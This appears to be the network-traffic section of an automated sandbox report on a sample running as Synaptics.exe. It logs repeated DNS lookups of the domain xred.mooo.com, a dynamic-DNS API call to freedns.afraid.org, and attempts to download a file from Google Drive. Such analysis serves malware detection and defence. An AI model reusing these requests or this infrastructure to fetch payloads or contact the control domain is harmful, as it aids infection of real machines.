                                                                                              Jan 2, 2025 20:29:50.142704964 CET44350296142.250.186.129192.168.2.7
                                                                                              Jan 2, 2025 20:29:50.144607067 CET50296443192.168.2.7142.250.186.129
                                                                                              Jan 2, 2025 20:29:50.144620895 CET44350296142.250.186.129192.168.2.7
                                                                                              Jan 2, 2025 20:29:50.147272110 CET44350295216.58.206.78192.168.2.7
                                                                                              Jan 2, 2025 20:29:50.147353888 CET50295443192.168.2.7216.58.206.78
                                                                                              Jan 2, 2025 20:29:50.148042917 CET44350295216.58.206.78192.168.2.7
                                                                                              Jan 2, 2025 20:29:50.148102999 CET50295443192.168.2.7216.58.206.78
                                                                                              Jan 2, 2025 20:29:50.149935007 CET50295443192.168.2.7216.58.206.78
                                                                                              Jan 2, 2025 20:29:50.149946928 CET44350295216.58.206.78192.168.2.7
                                                                                              Jan 2, 2025 20:29:50.150222063 CET44350295216.58.206.78192.168.2.7
                                                                                              Jan 2, 2025 20:29:50.150279045 CET50295443192.168.2.7216.58.206.78
                                                                                              Jan 2, 2025 20:29:50.150628090 CET50295443192.168.2.7216.58.206.78
                                                                                              Jan 2, 2025 20:29:50.191346884 CET44350295216.58.206.78192.168.2.7
                                                                                              Jan 2, 2025 20:29:50.547698021 CET44350298142.250.186.129192.168.2.7
                                                                                              Jan 2, 2025 20:29:50.547759056 CET50298443192.168.2.7142.250.186.129
                                                                                              Jan 2, 2025 20:29:50.548264980 CET50298443192.168.2.7142.250.186.129
                                                                                              Jan 2, 2025 20:29:50.548275948 CET44350298142.250.186.129192.168.2.7
                                                                                              Jan 2, 2025 20:29:50.548291922 CET44350295216.58.206.78192.168.2.7
                                                                                              Jan 2, 2025 20:29:50.548346043 CET50295443192.168.2.7216.58.206.78
                                                                                              Jan 2, 2025 20:29:50.548357010 CET44350295216.58.206.78192.168.2.7
                                                                                              Jan 2, 2025 20:29:50.548392057 CET50295443192.168.2.7216.58.206.78
                                                                                              Jan 2, 2025 20:29:50.548460960 CET50298443192.168.2.7142.250.186.129
                                                                                              Jan 2, 2025 20:29:50.548466921 CET44350298142.250.186.129192.168.2.7
                                                                                              Jan 2, 2025 20:29:50.548511028 CET50295443192.168.2.7216.58.206.78
                                                                                              Jan 2, 2025 20:29:50.548552990 CET44350295216.58.206.78192.168.2.7
                                                                                              Jan 2, 2025 20:29:50.548593998 CET50295443192.168.2.7216.58.206.78
                                                                                              Jan 2, 2025 20:29:50.549060106 CET50299443192.168.2.7216.58.206.78
                                                                                              Jan 2, 2025 20:29:50.549117088 CET44350299216.58.206.78192.168.2.7
                                                                                              Jan 2, 2025 20:29:50.549180984 CET50299443192.168.2.7216.58.206.78
                                                                                              Jan 2, 2025 20:29:50.549427032 CET50299443192.168.2.7216.58.206.78
                                                                                              Jan 2, 2025 20:29:50.549442053 CET44350299216.58.206.78192.168.2.7
                                                                                              Jan 2, 2025 20:29:50.580420017 CET44350296142.250.186.129192.168.2.7
                                                                                              Jan 2, 2025 20:29:50.580462933 CET44350296142.250.186.129192.168.2.7
                                                                                              Jan 2, 2025 20:29:50.580493927 CET50296443192.168.2.7142.250.186.129
                                                                                              Jan 2, 2025 20:29:50.580512047 CET44350296142.250.186.129192.168.2.7
                                                                                              Jan 2, 2025 20:29:50.580538034 CET50296443192.168.2.7142.250.186.129
                                                                                              Jan 2, 2025 20:29:50.580571890 CET50296443192.168.2.7142.250.186.129
                                                                                              Jan 2, 2025 20:29:50.580576897 CET44350296142.250.186.129192.168.2.7
                                                                                              Jan 2, 2025 20:29:50.580655098 CET50296443192.168.2.7142.250.186.129
                                                                                              Jan 2, 2025 20:29:50.581372976 CET50296443192.168.2.7142.250.186.129
                                                                                              Jan 2, 2025 20:29:50.581397057 CET44350296142.250.186.129192.168.2.7
                                                                                              Jan 2, 2025 20:29:50.582385063 CET50300443192.168.2.7142.250.186.129
                                                                                              Jan 2, 2025 20:29:50.582413912 CET44350300142.250.186.129192.168.2.7
                                                                                              Jan 2, 2025 20:29:50.582487106 CET50300443192.168.2.7142.250.186.129
                                                                                              Jan 2, 2025 20:29:50.582756996 CET50300443192.168.2.7142.250.186.129
                                                                                              Jan 2, 2025 20:29:50.582767010 CET44350300142.250.186.129192.168.2.7
                                                                                              Jan 2, 2025 20:29:50.585024118 CET44350297216.58.206.78192.168.2.7
                                                                                              Jan 2, 2025 20:29:50.585107088 CET50297443192.168.2.7216.58.206.78
                                                                                              Jan 2, 2025 20:29:50.585760117 CET44350297216.58.206.78192.168.2.7
                                                                                              Jan 2, 2025 20:29:50.585813046 CET50297443192.168.2.7216.58.206.78
                                                                                              Jan 2, 2025 20:29:50.587491989 CET50297443192.168.2.7216.58.206.78
                                                                                              Jan 2, 2025 20:29:50.587513924 CET44350297216.58.206.78192.168.2.7
                                                                                              Jan 2, 2025 20:29:50.587757111 CET44350297216.58.206.78192.168.2.7
                                                                                              Jan 2, 2025 20:29:50.587801933 CET50297443192.168.2.7216.58.206.78
                                                                                              Jan 2, 2025 20:29:50.588354111 CET50297443192.168.2.7216.58.206.78
                                                                                              Jan 2, 2025 20:29:50.635346889 CET44350297216.58.206.78192.168.2.7
                                                                                              Jan 2, 2025 20:29:50.977773905 CET44350298142.250.186.129192.168.2.7
                                                                                              Jan 2, 2025 20:29:50.977826118 CET44350298142.250.186.129192.168.2.7
                                                                                              Jan 2, 2025 20:29:50.977847099 CET50298443192.168.2.7142.250.186.129
                                                                                              Jan 2, 2025 20:29:50.977865934 CET44350298142.250.186.129192.168.2.7
                                                                                              Jan 2, 2025 20:29:50.977879047 CET50298443192.168.2.7142.250.186.129
                                                                                              Jan 2, 2025 20:29:50.977925062 CET50298443192.168.2.7142.250.186.129
                                                                                              Jan 2, 2025 20:29:50.977930069 CET44350298142.250.186.129192.168.2.7
                                                                                              Jan 2, 2025 20:29:50.977945089 CET44350298142.250.186.129192.168.2.7
                                                                                              Jan 2, 2025 20:29:50.977987051 CET50298443192.168.2.7142.250.186.129
                                                                                              Jan 2, 2025 20:29:50.977987051 CET50298443192.168.2.7142.250.186.129
                                                                                              Jan 2, 2025 20:29:51.011428118 CET44350297216.58.206.78192.168.2.7
                                                                                              Jan 2, 2025 20:29:51.011542082 CET50297443192.168.2.7216.58.206.78
                                                                                              Jan 2, 2025 20:29:51.011584044 CET44350297216.58.206.78192.168.2.7
                                                                                              Jan 2, 2025 20:29:51.011636972 CET50297443192.168.2.7216.58.206.78
                                                                                              Jan 2, 2025 20:29:51.012387037 CET44350297216.58.206.78192.168.2.7
                                                                                              Jan 2, 2025 20:29:51.012438059 CET44350297216.58.206.78192.168.2.7
                                                                                              Jan 2, 2025 20:29:51.012445927 CET50297443192.168.2.7216.58.206.78
                                                                                              Jan 2, 2025 20:29:51.012475967 CET50297443192.168.2.7216.58.206.78
                                                                                              Jan 2, 2025 20:29:51.177910089 CET44350299216.58.206.78192.168.2.7
                                                                                              Jan 2, 2025 20:29:51.177993059 CET50299443192.168.2.7216.58.206.78
                                                                                              Jan 2, 2025 20:29:51.178657055 CET44350299216.58.206.78192.168.2.7
                                                                                              Jan 2, 2025 20:29:51.178733110 CET50299443192.168.2.7216.58.206.78
                                                                                              Jan 2, 2025 20:29:51.264255047 CET44350300142.250.186.129192.168.2.7
                                                                                              Jan 2, 2025 20:29:51.264311075 CET50300443192.168.2.7142.250.186.129
                                                                                              Jan 2, 2025 20:30:11.454021931 CET50300443192.168.2.7142.250.186.129
                                                                                              Jan 2, 2025 20:30:11.454056978 CET44350300142.250.186.129192.168.2.7
                                                                                              Jan 2, 2025 20:30:11.454205036 CET50297443192.168.2.7216.58.206.78
                                                                                              Jan 2, 2025 20:30:11.454229116 CET44350297216.58.206.78192.168.2.7
                                                                                              Jan 2, 2025 20:30:11.454633951 CET50300443192.168.2.7142.250.186.129
                                                                                              Jan 2, 2025 20:30:11.454642057 CET44350300142.250.186.129192.168.2.7
                                                                                              Jan 2, 2025 20:30:11.457601070 CET50314443192.168.2.7216.58.206.78
                                                                                              Jan 2, 2025 20:30:11.457642078 CET44350314216.58.206.78192.168.2.7
                                                                                              Jan 2, 2025 20:30:11.457796097 CET50314443192.168.2.7216.58.206.78
                                                                                              Jan 2, 2025 20:30:11.462340117 CET50314443192.168.2.7216.58.206.78
                                                                                              Jan 2, 2025 20:30:11.462373018 CET44350314216.58.206.78192.168.2.7
                                                                                              Jan 2, 2025 20:30:11.793809891 CET44350300142.250.186.129192.168.2.7
                                                                                              Jan 2, 2025 20:30:11.793858051 CET44350300142.250.186.129192.168.2.7
                                                                                              Jan 2, 2025 20:30:11.793906927 CET50300443192.168.2.7142.250.186.129
                                                                                              Jan 2, 2025 20:30:11.793929100 CET44350300142.250.186.129192.168.2.7
                                                                                              Jan 2, 2025 20:30:11.793941021 CET50300443192.168.2.7142.250.186.129
                                                                                              Jan 2, 2025 20:30:11.793966055 CET50300443192.168.2.7142.250.186.129
                                                                                              Jan 2, 2025 20:30:11.793970108 CET44350300142.250.186.129192.168.2.7
                                                                                              Jan 2, 2025 20:30:11.793979883 CET44350300142.250.186.129192.168.2.7
                                                                                              Jan 2, 2025 20:30:11.794003963 CET50300443192.168.2.7142.250.186.129
                                                                                              Jan 2, 2025 20:30:11.794023037 CET50300443192.168.2.7142.250.186.129
                                                                                              Jan 2, 2025 20:30:12.229928970 CET44350314216.58.206.78192.168.2.7
                                                                                              Jan 2, 2025 20:30:12.230005980 CET50314443192.168.2.7216.58.206.78
                                                                                              Jan 2, 2025 20:30:27.416805983 CET4973880192.168.2.769.42.215.252
                                                                                              Jan 2, 2025 20:30:27.421319962 CET50299443192.168.2.7216.58.206.78
                                                                                              Jan 2, 2025 20:30:27.421350956 CET50298443192.168.2.7142.250.186.129
                                                                                              Jan 2, 2025 20:30:27.421351910 CET50314443192.168.2.7216.58.206.78
                                                                                              Jan 2, 2025 20:30:27.421577930 CET50300443192.168.2.7142.250.186.129

                                                                                              UDP Packets

                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                              Jan 2, 2025 20:28:45.247092009 CET5412253192.168.2.71.1.1.1
                                                                                              Jan 2, 2025 20:28:45.254236937 CET53541221.1.1.1192.168.2.7
                                                                                              Jan 2, 2025 20:28:46.115567923 CET5338453192.168.2.71.1.1.1
                                                                                              Jan 2, 2025 20:28:46.123019934 CET53533841.1.1.1192.168.2.7
                                                                                              Jan 2, 2025 20:28:46.126082897 CET6140953192.168.2.71.1.1.1
                                                                                              Jan 2, 2025 20:28:46.132945061 CET53614091.1.1.1192.168.2.7
                                                                                              Jan 2, 2025 20:28:46.319729090 CET6328353192.168.2.71.1.1.1
                                                                                              Jan 2, 2025 20:28:46.327032089 CET53632831.1.1.1192.168.2.7
                                                                                              Jan 2, 2025 20:28:52.662961006 CET6073553192.168.2.71.1.1.1
                                                                                              Jan 2, 2025 20:28:52.669975996 CET53607351.1.1.1192.168.2.7
                                                                                              Jan 2, 2025 20:28:59.528233051 CET5404453192.168.2.71.1.1.1
                                                                                              Jan 2, 2025 20:28:59.536026001 CET53540441.1.1.1192.168.2.7
                                                                                              Jan 2, 2025 20:29:04.060674906 CET4989453192.168.2.71.1.1.1
                                                                                              Jan 2, 2025 20:29:04.067717075 CET53498941.1.1.1192.168.2.7
                                                                                              Jan 2, 2025 20:29:09.775012970 CET5120753192.168.2.71.1.1.1
                                                                                              Jan 2, 2025 20:29:09.782500982 CET53512071.1.1.1192.168.2.7
                                                                                              Jan 2, 2025 20:29:16.796025991 CET5229953192.168.2.71.1.1.1
                                                                                              Jan 2, 2025 20:29:16.803419113 CET53522991.1.1.1192.168.2.7
                                                                                              Jan 2, 2025 20:29:23.669487953 CET6483253192.168.2.71.1.1.1
                                                                                              Jan 2, 2025 20:29:23.676872015 CET53648321.1.1.1192.168.2.7
                                                                                              Jan 2, 2025 20:29:30.795108080 CET5116553192.168.2.71.1.1.1
                                                                                              Jan 2, 2025 20:29:30.921506882 CET53511651.1.1.1192.168.2.7
                                                                                              Jan 2, 2025 20:29:37.716289043 CET5630453192.168.2.71.1.1.1
                                                                                              Jan 2, 2025 20:29:37.723759890 CET53563041.1.1.1192.168.2.7
                                                                                              Jan 2, 2025 20:29:44.522197962 CET6086553192.168.2.71.1.1.1
                                                                                              Jan 2, 2025 20:29:44.530414104 CET53608651.1.1.1192.168.2.7
                                                                                              Jan 2, 2025 20:29:49.107078075 CET5136653192.168.2.71.1.1.1
                                                                                              Jan 2, 2025 20:29:49.114979982 CET53513661.1.1.1192.168.2.7

                                                                                              DNS Queries

                                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                              Jan 2, 2025 20:28:45.247092009 CET192.168.2.71.1.1.10x8d73Standard query (0)docs.google.comA (IP address)IN (0x0001)false
                                                                                              Jan 2, 2025 20:28:46.115567923 CET192.168.2.71.1.1.10xd04eStandard query (0)xred.mooo.comA (IP address)IN (0x0001)false
                                                                                              Jan 2, 2025 20:28:46.126082897 CET192.168.2.71.1.1.10x847eStandard query (0)freedns.afraid.orgA (IP address)IN (0x0001)false
                                                                                              Jan 2, 2025 20:28:46.319729090 CET192.168.2.71.1.1.10x8b2bStandard query (0)drive.usercontent.google.comA (IP address)IN (0x0001)false
                                                                                              Jan 2, 2025 20:28:52.662961006 CET192.168.2.71.1.1.10x5e22Standard query (0)xred.mooo.comA (IP address)IN (0x0001)false
                                                                                              Jan 2, 2025 20:28:59.528233051 CET192.168.2.71.1.1.10x5784Standard query (0)xred.mooo.comA (IP address)IN (0x0001)false
                                                                                              Jan 2, 2025 20:29:04.060674906 CET192.168.2.71.1.1.10xd492Standard query (0)xred.mooo.comA (IP address)IN (0x0001)false
                                                                                              Jan 2, 2025 20:29:09.775012970 CET192.168.2.71.1.1.10xc4caStandard query (0)xred.mooo.comA (IP address)IN (0x0001)false
                                                                                              Jan 2, 2025 20:29:16.796025991 CET192.168.2.71.1.1.10xfc9aStandard query (0)xred.mooo.comA (IP address)IN (0x0001)false
                                                                                              Jan 2, 2025 20:29:23.669487953 CET192.168.2.71.1.1.10xabb1Standard query (0)xred.mooo.comA (IP address)IN (0x0001)false
                                                                                              Jan 2, 2025 20:29:30.795108080 CET192.168.2.71.1.1.10xa8beStandard query (0)xred.mooo.comA (IP address)IN (0x0001)false
                                                                                              Jan 2, 2025 20:29:37.716289043 CET192.168.2.71.1.1.10x726fStandard query (0)xred.mooo.comA (IP address)IN (0x0001)false
                                                                                              Jan 2, 2025 20:29:44.522197962 CET192.168.2.71.1.1.10xa5f4Standard query (0)xred.mooo.comA (IP address)IN (0x0001)false
                                                                                              Jan 2, 2025 20:29:49.107078075 CET192.168.2.71.1.1.10x182bStandard query (0)xred.mooo.comA (IP address)IN (0x0001)false

                                                                                              DNS Answers

                                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                              Jan 2, 2025 20:28:40.813858986 CET1.1.1.1192.168.2.70x1dc6No error (0)shed.dual-low.s-part-0017.t-0009.t-msedge.nets-part-0017.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                              Jan 2, 2025 20:28:40.813858986 CET1.1.1.1192.168.2.70x1dc6No error (0)s-part-0017.t-0009.t-msedge.net13.107.246.45A (IP address)IN (0x0001)false
                                                                                              Jan 2, 2025 20:28:45.254236937 CET1.1.1.1192.168.2.70x8d73No error (0)docs.google.com216.58.206.78A (IP address)IN (0x0001)false
                                                                                              Jan 2, 2025 20:28:46.123019934 CET1.1.1.1192.168.2.70xd04eName error (3)xred.mooo.comnonenoneA (IP address)IN (0x0001)false
                                                                                              Jan 2, 2025 20:28:46.132945061 CET1.1.1.1192.168.2.70x847eNo error (0)freedns.afraid.org69.42.215.252A (IP address)IN (0x0001)false
                                                                                              Jan 2, 2025 20:28:46.327032089 CET1.1.1.1192.168.2.70x8b2bNo error (0)drive.usercontent.google.com142.250.186.129A (IP address)IN (0x0001)false
                                                                                              Jan 2, 2025 20:28:52.669975996 CET1.1.1.1192.168.2.70x5e22Name error (3)xred.mooo.comnonenoneA (IP address)IN (0x0001)false
                                                                                              Jan 2, 2025 20:28:59.536026001 CET1.1.1.1192.168.2.70x5784Name error (3)xred.mooo.comnonenoneA (IP address)IN (0x0001)false
                                                                                              Jan 2, 2025 20:29:04.067717075 CET1.1.1.1192.168.2.70xd492Name error (3)xred.mooo.comnonenoneA (IP address)IN (0x0001)false
                                                                                              Jan 2, 2025 20:29:09.782500982 CET1.1.1.1192.168.2.70xc4caName error (3)xred.mooo.comnonenoneA (IP address)IN (0x0001)false
                                                                                              Jan 2, 2025 20:29:16.803419113 CET1.1.1.1192.168.2.70xfc9aName error (3)xred.mooo.comnonenoneA (IP address)IN (0x0001)false
                                                                                              Jan 2, 2025 20:29:23.676872015 CET1.1.1.1192.168.2.70xabb1Name error (3)xred.mooo.comnonenoneA (IP address)IN (0x0001)false
                                                                                              Jan 2, 2025 20:29:30.921506882 CET1.1.1.1192.168.2.70xa8beName error (3)xred.mooo.comnonenoneA (IP address)IN (0x0001)false
                                                                                              Jan 2, 2025 20:29:37.723759890 CET1.1.1.1192.168.2.70x726fName error (3)xred.mooo.comnonenoneA (IP address)IN (0x0001)false
                                                                                              Jan 2, 2025 20:29:44.530414104 CET1.1.1.1192.168.2.70xa5f4Name error (3)xred.mooo.comnonenoneA (IP address)IN (0x0001)false
                                                                                              Jan 2, 2025 20:29:48.212713957 CET1.1.1.1192.168.2.70xe02aNo error (0)shed.dual-low.s-part-0017.t-0009.t-msedge.nets-part-0017.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                              Jan 2, 2025 20:29:48.212713957 CET1.1.1.1192.168.2.70xe02aNo error (0)s-part-0017.t-0009.t-msedge.net13.107.246.45A (IP address)IN (0x0001)false
                                                                                              Jan 2, 2025 20:29:49.114979982 CET1.1.1.1192.168.2.70x182bName error (3)xred.mooo.comnonenoneA (IP address)IN (0x0001)false

                                                                                              HTTP Request Dependency Graph

                                                                                              • docs.google.com
                                                                                              • drive.usercontent.google.com
                                                                                              • freedns.afraid.org

                                                                                              HTTP Packets

                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              0192.168.2.74973869.42.215.252804136C:\ProgramData\Synaptics\Synaptics.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              Jan 2, 2025 20:28:46.139233112 CET154OUTGET /api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978 HTTP/1.1
                                                                                              User-Agent: MyApp
                                                                                              Host: freedns.afraid.org
                                                                                              Cache-Control: no-cache
                                                                                              Jan 2, 2025 20:28:46.764683962 CET243INHTTP/1.1 200 OK
                                                                                              Server: nginx
                                                                                              Date: Thu, 02 Jan 2025 19:28:46 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: keep-alive
                                                                                              Vary: Accept-Encoding
                                                                                              X-Cache: MISS
                                                                                              Data Raw: 31 66 0d 0a 45 52 52 4f 52 3a 20 43 6f 75 6c 64 20 6e 6f 74 20 61 75 74 68 65 6e 74 69 63 61 74 65 2e 0a 0d 0a 30 0d 0a 0d 0a
                                                                                              Data Ascii: 1fERROR: Could not authenticate.0


                                                                                              HTTPS Proxied Packets

                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              0192.168.2.749730216.58.206.784434136C:\ProgramData\Synaptics\Synaptics.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2025-01-02 19:28:45 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                              User-Agent: Synaptics.exe
                                                                                              Host: docs.google.com
                                                                                              Cache-Control: no-cache
                                                                                              2025-01-02 19:28:46 UTC1314INHTTP/1.1 303 See Other
                                                                                              Content-Type: application/binary
                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                              Date: Thu, 02 Jan 2025 19:28:46 GMT
                                                                                              Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-YXa5I6prhVMJWENejiPbbg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                              Server: ESF
                                                                                              Content-Length: 0
                                                                                              X-XSS-Protection: 0
                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                              X-Content-Type-Options: nosniff
                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                              Connection: close


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              1192.168.2.749731216.58.206.784434136C:\ProgramData\Synaptics\Synaptics.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2025-01-02 19:28:45 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                              User-Agent: Synaptics.exe
                                                                                              Host: docs.google.com
                                                                                              Cache-Control: no-cache
                                                                                              2025-01-02 19:28:46 UTC1314INHTTP/1.1 303 See Other
                                                                                              Content-Type: application/binary
                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                              Date: Thu, 02 Jan 2025 19:28:46 GMT
                                                                                              Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-LXdDZXcs0bahE21UlmY8pw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                              Server: ESF
                                                                                              Content-Length: 0
                                                                                              X-XSS-Protection: 0
                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                              X-Content-Type-Options: nosniff
                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                              Connection: close


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              2192.168.2.749739216.58.206.784434136C:\ProgramData\Synaptics\Synaptics.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2025-01-02 19:28:47 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                              User-Agent: Synaptics.exe
                                                                                              Host: docs.google.com
                                                                                              Cache-Control: no-cache
                                                                                              2025-01-02 19:28:47 UTC1314INHTTP/1.1 303 See Other
                                                                                              Content-Type: application/binary
                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                              Date: Thu, 02 Jan 2025 19:28:47 GMT
                                                                                              Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-rpuZPc6JofLwGGZQuUhaXw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                              Server: ESF
                                                                                              Content-Length: 0
                                                                                              X-XSS-Protection: 0
                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                              X-Content-Type-Options: nosniff
                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                              Connection: close


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              3192.168.2.749741142.250.186.1294434136C:\ProgramData\Synaptics\Synaptics.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2025-01-02 19:28:47 UTC186OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                              User-Agent: Synaptics.exe
                                                                                              Cache-Control: no-cache
                                                                                              Host: drive.usercontent.google.com
                                                                                              Connection: Keep-Alive
                                                                                              2025-01-02 19:28:47 UTC1601INHTTP/1.1 404 Not Found
                                                                                              X-GUploader-UploadID: AFiumC714OY6lN9GeZAqrrpU3d3lJD3AoLeb1qg5Bf9XfnRF4B3LX4WNDnq0j9ua3C0s4daz9iXqUUw
                                                                                              Content-Type: text/html; charset=utf-8
                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                              Date: Thu, 02 Jan 2025 19:28:47 GMT
                                                                                              P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-A3uh3cPYMgjzeORY3fSszg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                              Content-Length: 1652
                                                                                              Server: UploadServer
                                                                                              Set-Cookie: NID=520=O3h5K0Mlym-rrLjhzGpk4j7uTinDx0L_6UzibdP1RDC_dxub7vgJKYEHbgEy2EUzTv6j_Scn4-yJmKWdQ7GPwv8A4sHSmxpOkYMPAnFnYaMPENGOIsuDmm1Y5WSmNZAxu3tfYoY7sv5Qty8H7UJa53mIoIRZkFIVFgAxzxyrueB1f-dHIGAb-TA; expires=Fri, 04-Jul-2025 19:28:47 GMT; path=/; domain=.google.com; HttpOnly
                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                              Content-Security-Policy: sandbox allow-scripts
                                                                                              Connection: close
